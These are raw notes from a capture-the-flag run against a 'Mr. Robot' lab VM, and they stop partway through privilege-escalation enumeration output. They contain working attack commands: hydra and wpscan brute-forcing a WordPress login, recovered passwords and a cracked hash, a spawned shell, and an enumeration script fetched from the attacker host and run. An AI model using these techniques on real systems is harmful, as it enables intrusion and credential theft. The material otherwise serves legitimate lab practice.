nmap -sT -sV -sC -p- 10.0.2.29
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-04 04:26 EDT
Nmap scan report for 10.0.2.29
Host is up (0.00068s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache
MAC Address: 08:00:27:2C:00:80 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.48 seconds


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


nikto -h 10.0.2.29            
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.29
+ Target Hostname:    10.0.2.29
+ Target Port:        80
+ Start Time:         2022-07-04 04:45:16 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://10.0.2.29/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2022-07-04 04:51:30 (GMT-4) (374 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested



||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

http://10.0.2.29/robots.txt

http://10.0.2.29/key-1-of-3.txt

key 1 -> 073403c8a58a1f80d943455fb30724b9

http://10.0.2.29/fsocity.dic


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


hydra -V -L /home/kali/Documents/CTFs/Mr.\ Robot/fsocity.dic -p test 10.0.2.29 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'  


[80][http-post-form] host: 10.0.2.29   login: Elliot   password: test

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


cat fsocity.dic | sort -u | uniq > newfsocity.dic

wpscan --url 10.0.2.29 --passwords /home/kali/Documents/CTFs/Mr.\ Robot/newfsocity.dic --usernames Elliot

Username: Elliot, Password: ER28-0652













<?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @package WordPress
 * @subpackage Twenty_Fifteen
 * @since Twenty Fifteen 1.0
 */

get_header(); ?>

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

			<section class="error-404 not-found">
				<header class="page-header">
					<h1 class="page-title"><?php _e( 'Oops! That page can&rsquo;t be found.', 'twentyfifteen' ); ?></h1>
				</header><!-- .page-header -->

				<div class="page-content">
					<p><?php _e( 'It looks like nothing was found at this location. Maybe try a search?', 'twentyfifteen' ); ?></p>

					<?php get_search_form(); ?>
				</div><!-- .page-content -->
			</section><!-- .error-404 -->

		</main><!-- .site-main -->
	</div><!-- .content-area -->

<?php get_footer(); ?>





||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

whoami
deamon

pwd
/

cd home
cd robot
ls

cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
robot user decryption -> abcdefghijklmnopqrstuvwxyz

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

cd tmp
wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

wget http://10.0.2.15/LinEnum/LinEnum.sh

chmod 777 LinEnum.sh
./LinEnum.sh


#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Mon Jul  4 10:41:37 UTC 2022                                                                                                                                                                 
                                                                                                                                                                                             

### SYSTEM ##############################################
[-] Kernel information:
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 3.13.0-55-generic (buildd@brownie) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.2 LTS"
NAME="Ubuntu"
VERSION="14.04.2 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.2 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"


[-] Hostname:
linux


### USER/GROUP ##########################################
[-] Current user/group info:
uid=1(daemon) gid=1(daemon) groups=1(daemon)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Sat Nov 14 23:32:42 +0000 2015
bitnamiftp       tty1                      Fri Nov 13 01:15:03 +0000 2015
robot            tty1                      Fri Nov 13 23:50:42 +0000 2015


[-] Who else is logged on:
 10:41:37 up  2:17,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm)
uid=102(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(ftp) gid=106(ftp) groups=106(ftp)
uid=1000(bitnamiftp) gid=1000(bitnami) groups=1000(bitnami)
uid=1001(mysql) gid=1001(mysql) groups=1001(mysql)
uid=999(varnish) gid=999(varnish) groups=999(varnish)
uid=1002(robot) gid=1002(robot) groups=1002(robot)


[-] It looks like we have some admin users:
uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false
mysql:x:1001:1001::/home/mysql:
varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:


[-] Super user account(s):
root


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root root 4.0K Nov 13  2015 .
drwxr-xr-x 22 root root 4.0K Sep 16  2015 ..
drwxr-xr-x  2 root root 4.0K Nov 13  2015 robot


### ENVIRONMENTAL #######################################
[-] Environment information:
LDAPCONF=/opt/bitnami/common/etc/openldap/ldap.conf
SSL_CERT_FILE=/opt/bitnami/common/openssl/certs/curl-ca-bundle.crt
CURL_CA_BUNDLE=/opt/bitnami/common/openssl/certs/curl-ca-bundle.crt
MAGICK_CONFIGURE_PATH=
GS_LIB=
OPENSSL_ENGINES=/opt/bitnami/common/lib/engines
MAGICK_CODER_MODULE_PATH=
USER=daemon
FREETDSLOCALES=
PATH=/opt/bitnami/varnish/bin:/opt/bitnami/sqlite/bin:/opt/bitnami/php/bin:/opt/bitnami/mysql/bin:/opt/bitnami/apache2/bin:/opt/bitnami/common/bin:/sbin:/usr/sbin:/bin:/usr/bin
PWD=/tmp
FREETDSCONF=
MAGICK_HOME=
SHLVL=1
HOME=/usr/sbin
OPENSSL_CONF=/opt/bitnami/common/openssl/openssl.cnf
_=/usr/bin/env


[-] Path information:
/opt/bitnami/varnish/bin:/opt/bitnami/sqlite/bin:/opt/bitnami/php/bin:/opt/bitnami/mysql/bin:/opt/bitnami/apache2/bin:/opt/bitnami/common/bin:/sbin:/usr/sbin:/bin:/usr/bin
drwxr-xr-x 2 root root  4096 Sep 16  2015 /bin
drwxr-xr-x 2 root root  4096 Sep 16  2015 /opt/bitnami/apache2/bin
drwxr-xr-x 2 root root  4096 Sep 16  2015 /opt/bitnami/common/bin
drwxr-xr-x 2 root root  4096 Sep 16  2015 /opt/bitnami/mysql/bin
drwxr-xr-x 2 root root  4096 Sep 16  2015 /opt/bitnami/php/bin
drwxr-xr-x 2 root root  4096 Sep 16  2015 /opt/bitnami/sqlite/bin
drwxr-xr-x 2 root root  4096 Sep 16  2015 /opt/bitnami/varnish/bin
drwxr-xr-x 2 root root  4096 Nov 13  2015 /sbin
drwxr-xr-x 2 root root 20480 Nov 13  2015 /usr/bin
drwxr-xr-x 2 root root  4096 Nov 13  2015 /usr/sbin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

/bin/bitnami_ftp_false


[-] Current umask value:
0000
u=rwx,g=rwx,o=rwx


[-] umask value as specified in /etc/login.defs:
UMASK           022


[-] Password and storage information:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  787 Jul  4  2022 /etc/crontab

/etc/cron.d:
total 12
drwxr-xr-x  2 root root 4096 Jun 24  2015 .
drwxr-xr-x 77 root root 4096 Jul  4  2022 ..
-rw-r--r--  1 root root  102 Feb  9  2013 .placeholder

/etc/cron.daily:
total 44
drwxr-xr-x  2 root root  4096 Jun 24  2015 .
drwxr-xr-x 77 root root  4096 Jul  4  2022 ..
-rw-r--r--  1 root root   102 Feb  9  2013 .placeholder
-rwxr-xr-x  1 root root 15481 Apr 10  2014 apt
-rwxr-xr-x  1 root root   256 Mar  7  2014 dpkg
-rwxr-xr-x  1 root root   372 Jan 22  2014 logrotate
-rwxr-xr-x  1 root root   249 Feb 17  2014 passwd
-rwxr-xr-x  1 root root   328 Jul 18  2014 upstart

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Jun 24  2015 .
drwxr-xr-x 77 root root 4096 Jul  4  2022 ..
-rw-r--r--  1 root root  102 Feb  9  2013 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Jun 24  2015 .
drwxr-xr-x 77 root root 4096 Jul  4  2022 ..
-rw-r--r--  1 root root  102 Feb  9  2013 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x  2 root root 4096 Jun 24  2015 .
drwxr-xr-x 77 root root 4096 Jul  4  2022 ..
-rw-r--r--  1 root root  102 Feb  9  2013 .placeholder
-rwxr-xr-x  1 root root  427 Apr 16  2014 fstrim


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
45 * * * * bitnami cd /opt/bitnami/stats && ./agent.bin --run -D


### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 08:00:27:2c:00:80  
          inet addr:10.0.2.29  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe2c:80/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:393098 errors:30 dropped:0 overruns:0 frame:0
          TX packets:738549 errors:3 dropped:0 overruns:0 carrier:3
          collisions:0 txqueuelen:1000 
          RX bytes:63484576 (63.4 MB)  TX bytes:891479062 (891.4 MB)
          Interrupt:19 Base address:0xd020 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:58298 errors:0 dropped:0 overruns:0 frame:0
          TX packets:58298 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:44763128 (44.7 MB)  TX bytes:44763128 (44.7 MB)


[-] ARP history:
? (10.0.2.1) at 52:54:00:12:35:00 [ether] on eth0
? (10.0.2.67) at 08:00:27:50:4c:14 [ether] on eth0
? (10.0.2.15) at 08:00:27:50:4c:14 [ether] on eth0


[-] Nameserver(s):
nameserver 1.1.1.1
nameserver 1.0.0.1
nameserver 127.0.1.1


[-] Default route:
default         10.0.2.1        0.0.0.0         UG    0      0        0 eth0


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:21            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:2812          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::443                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:64621           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp6       0      0 :::47378                :::*                                -               


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.2  33320  1448 ?        Ss   08:24   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    08:24   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    08:24   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    08:24   0:00 [kworker/0:0]
root         5  0.0  0.0      0     0 ?        S<   08:24   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    08:24   0:03 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    08:24   0:06 [rcuos/0]
root         9  0.0  0.0      0     0 ?        S    08:24   0:00 [rcu_bh]
root        10  0.0  0.0      0     0 ?        S    08:24   0:00 [rcuob/0]
root        11  0.0  0.0      0     0 ?        S    08:24   0:00 [migration/0]
root        12  0.0  0.0      0     0 ?        S    08:24   0:00 [watchdog/0]
root        13  0.0  0.0      0     0 ?        S<   08:24   0:00 [khelper]
root        14  0.0  0.0      0     0 ?        S    08:24   0:00 [kdevtmpfs]
root        15  0.0  0.0      0     0 ?        S<   08:24   0:00 [netns]
root        16  0.0  0.0      0     0 ?        S<   08:24   0:00 [writeback]
root        17  0.0  0.0      0     0 ?        S<   08:24   0:00 [kintegrityd]
root        18  0.0  0.0      0     0 ?        S<   08:24   0:00 [bioset]
root        19  0.0  0.0      0     0 ?        S<   08:24   0:00 [kworker/u3:0]
root        20  0.0  0.0      0     0 ?        S<   08:24   0:00 [kblockd]
root        21  0.0  0.0      0     0 ?        S<   08:24   0:00 [ata_sff]
root        22  0.0  0.0      0     0 ?        S    08:24   0:00 [khubd]
root        23  0.0  0.0      0     0 ?        S<   08:24   0:00 [md]
root        24  0.0  0.0      0     0 ?        S<   08:24   0:00 [devfreq_wq]
root        27  0.0  0.0      0     0 ?        S    08:24   0:00 [khungtaskd]
root        28  0.0  0.0      0     0 ?        S    08:24   0:00 [kswapd0]
root        29  0.0  0.0      0     0 ?        SN   08:24   0:00 [ksmd]
root        30  0.0  0.0      0     0 ?        S    08:24   0:00 [fsnotify_mark]
root        31  0.0  0.0      0     0 ?        S    08:24   0:00 [ecryptfs-kthrea]
root        32  0.0  0.0      0     0 ?        S<   08:24   0:00 [crypto]
root        44  0.0  0.0      0     0 ?        S<   08:24   0:00 [kthrotld]
root        46  0.0  0.0      0     0 ?        S    08:24   0:00 [scsi_eh_0]
root        47  0.0  0.0      0     0 ?        S    08:24   0:00 [scsi_eh_1]
root        49  0.0  0.0      0     0 ?        S    08:24   0:00 [kworker/u2:3]
root        68  0.0  0.0      0     0 ?        S<   08:24   0:00 [deferwq]
root        69  0.0  0.0      0     0 ?        S<   08:24   0:00 [charger_manager]
root        70  0.0  0.0      0     0 ?        S    08:24   0:00 [kworker/u2:4]
root       117  0.0  0.0      0     0 ?        S<   08:24   0:00 [kpsmoused]
root       128  0.0  0.0      0     0 ?        S<   08:24   0:01 [kworker/u3:1]
root       129  0.0  0.0      0     0 ?        S    08:24   0:01 [jbd2/sda1-8]
root       130  0.0  0.0      0     0 ?        S<   08:24   0:00 [ext4-rsv-conver]
root       274  0.0  0.0  19596   428 ?        S    08:24   0:00 upstart-udev-bridge --daemon
root       278  0.0  0.1  49812   536 ?        Ss   08:24   0:00 /lib/systemd/systemd-udevd --daemon
syslog     355  0.0  0.0 255840   216 ?        Ssl  08:24   0:00 rsyslogd
root       372  0.0  0.0  15272   232 ?        S    08:24   0:00 upstart-file-bridge --daemon
root       407  0.0  0.0      0     0 ?        S    08:24   0:00 [kworker/0:2]
root       689  0.0  0.0  10220     8 ?        Ss   08:24   0:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root       902  0.0  0.0  23536   116 ?        Ss   08:24   0:00 /usr/sbin/vsftpd
root      1021  0.0  0.0  14536    28 tty4     Ss+  08:24   0:00 /sbin/getty -8 38400 tty4
root      1023  0.0  0.0  14536    28 tty5     Ss+  08:24   0:00 /sbin/getty -8 38400 tty5
root      1025  0.0  0.0  14536    28 tty2     Ss+  08:24   0:00 /sbin/getty -8 38400 tty2
root      1026  0.0  0.0  14536    28 tty3     Ss+  08:24   0:00 /sbin/getty -8 38400 tty3
root      1029  0.0  0.0  14536    28 tty6     Ss+  08:24   0:00 /sbin/getty -8 38400 tty6
root      1053  0.0  0.0  23652     8 ?        Ss   08:24   0:00 cron
root      1085  0.0  0.0  15520   296 ?        S    08:24   0:00 upstart-socket-bridge --daemon
root      1203  0.0  0.0   4440    24 ?        S    08:24   0:00 /bin/sh /opt/bitnami/mysql/bin/mysqld_safe --defaults-file=/opt/bitnami/mysql/my.cnf --port=3306 --socket=/opt/bitnami/mysql/tmp/mysql.sock --datadir=/opt/bitnami/mysql/data --log-error=/opt/bitnami/mysql/data/mysqld.log --pid-file=/opt/bitnami/mysql/data/mysqld.pid --lower-case-table-names=1
mysql     1493  2.3 26.3 1306408 132372 ?      Sl   08:24   3:15 /opt/bitnami/mysql/bin/mysqld.bin --defaults-file=/opt/bitnami/mysql/my.cnf --basedir=/opt/bitnami/mysql --datadir=/opt/bitnami/mysql/data --plugin-dir=/opt/bitnami/mysql/lib/plugin --user=mysql --lower-case-table-names=1 --log-error=/opt/bitnami/mysql/data/mysqld.log --pid-file=/opt/bitnami/mysql/data/mysqld.pid --socket=/opt/bitnami/mysql/tmp/mysql.sock --port=3306
root      1555  0.0  1.0 258616  5284 ?        Ss   08:24   0:00 php-fpm: master process (/opt/bitnami/php/etc/php-fpm.conf)                                                                                                                                                                                                                          
root      1568  0.0  3.9 207948 19676 ?        Ss   08:24   0:00 /opt/bitnami/apache2/bin/httpd.bin -f /opt/bitnami/apache2/conf/httpd.conf -DDISABLE_BANNER
daemon    1587  0.1  5.0 990828 25172 ?        Sl   08:24   0:14 /opt/bitnami/apache2/bin/httpd.bin -f /opt/bitnami/apache2/conf/httpd.conf -DDISABLE_BANNER
daemon    1588  0.2  5.7 986644 28676 ?        Sl   08:24   0:18 /opt/bitnami/apache2/bin/httpd.bin -f /opt/bitnami/apache2/conf/httpd.conf -DDISABLE_BANNER
daemon    1589  0.6  5.2 990752 26320 ?        Sl   08:24   0:50 /opt/bitnami/apache2/bin/httpd.bin -f /opt/bitnami/apache2/conf/httpd.conf -DDISABLE_BANNER
root      1716  0.0  0.2 104328  1072 ?        Sl   08:25   0:00 /usr/bin/monit -c /etc/monit/monitrc
root      1755  0.0  0.0      0     0 ?        S    08:25   0:00 [kauditd]
root      1757  0.0  0.0  14536   424 tty1     Ss+  08:26   0:00 /sbin/getty -8 38400 tty1
daemon    1766  0.8  5.2 999256 26564 ?        Sl   08:28   1:03 /opt/bitnami/apache2/bin/httpd.bin -f /opt/bitnami/apache2/conf/httpd.conf -DDISABLE_BANNER
daemon    1887  3.0  5.9 264896 29604 ?        S    09:53   1:28 php-fpm: pool wordpress                                                                                                                                                                                                                                                              
daemon    1888  0.3  6.3 264896 31900 ?        S    09:57   0:10 php-fpm: pool wordpress                                                                                                                                                                                                                                                              
daemon    1889  0.3  7.9 270256 39976 ?        S    09:57   0:08 php-fpm: pool wordpress                                                                                                                                                                                                                                                              
daemon    1890  0.0  3.0 270256 15444 ?        Ss   10:31   0:00 php-fpm: pool wordpress                                                                                                                                                                                                                                                              
daemon    1891  0.0  0.1   4440   652 ?        S    10:31   0:00 sh -c uname -a; w; id; /bin/sh -i
daemon    1895  0.0  0.1   4440   688 ?        S    10:31   0:00 /bin/sh -i
daemon    1896  0.0  4.4 264896 22404 ?        Ss   10:31   0:00 php-fpm: pool wordpress                                                                                                                                                                                                                                                              
daemon    1922  0.0  0.4  18952  2452 ?        S    10:41   0:00 /bin/bash ./LinEnum.sh
daemon    1923  0.1  0.3  18996  1980 ?        S    10:41   0:00 /bin/bash ./LinEnum.sh
daemon    1924  0.0  0.0   4344   356 ?        S    10:41   0:00 tee -a
root      2098  0.0  0.1  49808   596 ?        S    10:41   0:00 /lib/systemd/systemd-udevd --daemon
daemon    2108  0.0  0.3  18980  1680 ?        S    10:41   0:00 /bin/bash ./LinEnum.sh
daemon    2109  0.0  0.2  15564  1156 ?        R    10:41   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root  1021112 Oct  7  2014 /bin/bash
lrwxrwxrwx 1 root root        4 Feb 19  2014 /bin/sh -> dash
-rwxr-xr-x 1 root root   239896 Apr 15  2015 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root   678528 Sep  7  2015 /opt/bitnami/apache2/bin/httpd.bin
-rwxr-xr-x 1 root root 13966352 Sep  7  2015 /opt/bitnami/mysql/bin/mysqld.bin
-rwxr-xr-x 2 root root    32112 Feb 12  2015 /sbin/getty
-rwxr-xr-x 1 root root   265848 Jul 18  2014 /sbin/init
-rwxr-xr-x 1 root root   534728 Nov 17  2013 /usr/bin/monit
-rwxr-xr-x 1 root root   164072 May  1  2014 /usr/sbin/vsftpd


[-] /etc/init.d/ binary permissions:
total 148
drwxr-xr-x  2 root root 4096 Sep 16  2015 .
drwxr-xr-x 77 root root 4096 Jul  4  2022 ..
-rw-r--r--  1 root root    0 Jun 24  2015 .legacy-bootordering
-rw-r--r--  1 root root 2427 Mar 13  2014 README
-rwxr-xr-x  1 root root 1333 Sep 16  2015 bitnami
-rwxr-xr-x  1 root root 1919 Jan 18  2011 console-setup
lrwxrwxrwx  1 root root   21 Feb  9  2013 cron -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1105 May 13  2015 grub-common
-rwxr-xr-x  1 root root 1329 Mar 13  2014 halt
-rwxr-xr-x  1 root root 1293 Mar 13  2014 killprocs
-rwxr-xr-x  1 root root 1990 Jan 22  2013 kmod
-rwxr-xr-x  1 root root 2664 Nov 16  2013 monit
-rwxr-xr-x  1 root root 4479 Mar 20  2014 networking
-rwxr-xr-x  1 root root 1346 Mar 13  2015 ondemand
-rwxr-xr-x  1 root root 1192 May 27  2013 procps
-rwxr-xr-x  1 root root 6120 Mar 13  2014 rc
-rwxr-xr-x  1 root root  782 Mar 13  2014 rc.local
-rwxr-xr-x  1 root root  117 Mar 13  2014 rcS
-rwxr-xr-x  1 root root  639 Mar 13  2014 reboot
-rwxr-xr-x  1 root root 2918 Jun 13  2014 resolvconf
-rwxr-xr-x  1 root root 4395 Apr 17  2014 rsync
-rwxr-xr-x  1 root root 2913 Dec  4  2013 rsyslog
-rwxr-xr-x  1 root root 1226 Jul 22  2013 screen-cleanup
-rwxr-xr-x  1 root root 3920 Mar 13  2014 sendsigs
-rwxr-xr-x  1 root root  590 Mar 13  2014 single
-rw-r--r--  1 root root 4290 Mar 13  2014 skeleton
-rwxr-xr-x  1 root root 4077 May  2  2014 ssh
-rwxr-xr-x  1 root root  731 Feb  5  2014 sudo
-rwxr-xr-x  1 root root 6173 Apr 14  2014 udev
-rwxr-xr-x  1 root root 2721 Mar 13  2014 umountfs
-rwxr-xr-x  1 root root 2260 Mar 13  2014 umountnfs.sh
-rwxr-xr-x  1 root root 1872 Mar 13  2014 umountroot
-rwxr-xr-x  1 root root 3111 Mar 13  2014 urandom
-rwxr-xr-x  1 root root 2666 Oct  8  2014 x11-common


[-] /etc/init/ config file permissions:
total 316
drwxr-xr-x  2 root root 4096 Nov 13  2015 .
drwxr-xr-x 77 root root 4096 Jul  4  2022 ..
-rw-r--r--  1 root root  328 Feb 22  2014 bootmisc.sh.conf
-rw-r--r--  1 root root  232 Feb 22  2014 checkfs.sh.conf
-rw-r--r--  1 root root  253 Feb 22  2014 checkroot-bootclean.sh.conf
-rw-r--r--  1 root root  307 Feb 22  2014 checkroot.sh.conf
-rw-r--r--  1 root root  250 Oct  9  2012 console-font.conf
-rw-r--r--  1 root root  509 Dec 21  2010 console-setup.conf
-rw-r--r--  1 root root  266 Apr 11  2014 console.conf
-rw-r--r--  1 root root 1122 Apr 11  2014 container-detect.conf
-rw-r--r--  1 root root  356 Apr 11  2014 control-alt-delete.conf
-rw-r--r--  1 root root  297 Feb  9  2013 cron.conf
-rw-r--r--  1 root root  273 Nov 19  2010 dmesg.conf
-rw-r--r--  1 root root 1377 Apr 11  2014 failsafe.conf
-rw-r--r--  1 root root  267 Apr 11  2014 flush-early-job-log.conf
-rw-r--r--  1 root root  284 Jul 23  2013 hostname.conf
-rw-r--r--  1 root root  444 Apr 16  2014 hwclock-save.conf
-rw-r--r--  1 root root  557 Apr 16  2014 hwclock.conf
-rw-r--r--  1 root root  689 Apr 10  2014 kmod.conf
-rw-r--r--  1 root root  268 Feb 22  2014 mountall-bootclean.sh.conf
-rw-r--r--  1 root root  349 Feb 22  2014 mountall-net.conf
-rw-r--r--  1 root root  261 Feb 22  2014 mountall-reboot.conf
-rw-r--r--  1 root root 1201 Feb 22  2014 mountall-shell.conf
-rw-r--r--  1 root root 1232 Feb 22  2014 mountall.conf
-rw-r--r--  1 root root  311 Feb 22  2014 mountall.sh.conf
